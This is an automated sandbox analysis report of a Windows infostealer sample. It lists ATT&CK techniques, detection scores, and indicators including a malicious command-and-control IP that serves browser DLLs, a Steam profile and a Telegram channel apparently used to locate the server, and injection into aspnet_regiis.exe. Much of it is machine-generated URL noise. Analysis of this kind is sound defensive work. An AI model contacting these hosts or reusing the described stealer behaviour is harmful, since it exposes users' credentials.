                          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                          Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                          Execution: 1 Windows Management Instrumentation; 1 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                          Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                          Privilege Escalation: 1 DLL Side-Loading; 511 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                          Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 511 Process Injection; HTML Smuggling
                          Credential Access: 2 OS Credential Dumping; 1 Credentials in Registry; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                          Discovery: 2 System Time Discovery; 1 Account Discovery; 4 File and Directory Discovery; 54 System Information Discovery; 151 Security Software Discovery; 31 Virtualization/Sandbox Evasion; 12 Process Discovery; 1 Application Window Discovery; 1 System Owner/User Discovery
                          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                          Collection: 1 Archive Collected Data; 4 Data from Local System; 1 Screen Capture; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                          Command and Control: 2 Ingress Tool Transfer; 21 Encrypted Channel; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                          Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                          [Behavior graph: ID 1524661, sample file.exe, start date 03/10/2024, architecture WINDOWS, score 100]

                          Source | Detection | Scanner | Label | Link
                          file.exe | 21% | ReversingLabs | Win32.Infostealer.Generic |
                          file.exe | 31% | Virustotal | | Browse
                          file.exe | 100% | Joe Sandbox ML | |

                          Source | Detection | Scanner | Label | Link
                          C:\Users\user\AppData\Roaming\msvcp110.dll | 100% | Joe Sandbox ML | |
                          C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
                          C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
                          C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
                          C:\ProgramData\nss3.dll | 0% | ReversingLabs | |
                          C:\ProgramData\softokn3.dll | 0% | ReversingLabs | |
                          C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | |

                          No Antivirus matches

                          Source | Detection | Scanner | Label | Link
                          steamcommunity.com | 0% | Virustotal | | Browse
                          Name | IP | Active | Malicious | Antivirus Detection | Reputation
                          steamcommunity.com | 104.102.49.254 | true | true | | unknown

                          Name | Malicious | Antivirus Detection | Reputation
                          https://49.12.197.9/ | true | | unknown
                          https://49.12.197.9/freebl3.dll | true | | unknown
                          https://49.12.197.9/sqlp.dll | true | | unknown
                          https://49.12.197.9/softokn3.dll | true | | unknown
                          https://49.12.197.9/vcruntime140.dll | true | | unknown
                          https://49.12.197.9/nss3.dll | true | | unknown
                          https://49.12.197.9/mozglue.dll | true | | unknown
                                            unknown
                                            http://www.valvesoftware.com/legal.htmaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://www.youtube.comaspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                            https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngaspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://49.12.197.9/;aspnet_regiis.exe, 00000003.00000003.2664851403.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2664696725.0000000002FC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://www.google.comaspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                              http://cowod.hopto.org_DEBUG.zip/cfile.exe, 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalseunknown
                                              https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngaspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://49.12.197.976561199780418869[1].htm.3.drfalseunknown
                                              https://49.12.197.9/Aaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=easpnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                                https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackaspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0file.exe, 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalseunknown
                                                https://49.12.197.9FHIEHDGI--aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzolaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                                  https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLaspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2aaspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://s.ytimg.com;aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://steam.tv/aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://49.12.197.9/-end-point:faspnet_regiis.exe, 00000003.00000003.2650340672.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://49.12.197.9/5aspnet_regiis.exe, 00000003.00000003.2650340672.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://49.12.197.9HIEBAKaspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://49.12.197.9/CAAFHIEBKJaspnet_regiis.exe, 00000003.00000003.2530342786.0000000002FB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://t.me/ae5edfile.exe, 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://www.mozilla.com/en-US/blocklist/aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.3402896622.000000006C80D000.00000002.00000001.01000000.0000000B.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.drfalseunknown
                                                              https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://mozilla.org0/aspnet_regiis.exe, 00000003.00000003.2551866824.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3396775250.000000004029C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3391719379.00000000343C9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3383490094.0000000022576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650431203.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3386270513.00000000284EA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2650482641.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2552045952.0000000002FD1000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwPaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalseunknown
                                                              http://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiECBGCB.3.drfalse
                                                                unknown
                                                                https://49.12.197.9/$aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://store.steampowered.com/points/shop/aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sfile.exefalse
                                                                    unknown
                                                                    https://sketchfab.comaspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000003.00000003.2518193807.0000000002FF0000.00000004.00000020.00020000.00000000.sdmp, AEHIEC.3.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://lv.queniujq.cnaspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brEBAFBG.3.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://www.youtube.com/aspnet_regiis.exe, 00000003.00000003.2379882274.0000000002F1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&aaspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                          unknown
                                                                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199780418869[1].htm.3.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://store.steampowered.com/privacy_agreement/aspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2379758595.0000000002F0C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=enaspnet_regiis.exe, 00000003.00000003.2437164159.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2423595894.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409295139.0000000002F18000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2390187972.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2409259274.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450997934.0000000002F19000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2450928999.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3373275406.0000000002F0E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drfalse
                                                                            unknown
IP | Domain | Country | ASN | ASN Name | Malicious
49.12.197.9 | unknown | Germany | 24940 | HETZNER-ASDE | true
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
147.45.44.104 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1524661
Start date and time: 2024-10-03 03:34:35 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@5/24@1/3
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      • Number of executed functions: 96
                                                                                                      • Number of non-executed functions: 181
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe
                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Not all processes were analyzed, report is missing behavior information
                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      Time | Type | Description
                                                                                                      21:35:58 | API Interceptor | 1x Sleep call for process: aspnet_regiis.exe modified
                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                                                                  Encrypted:false
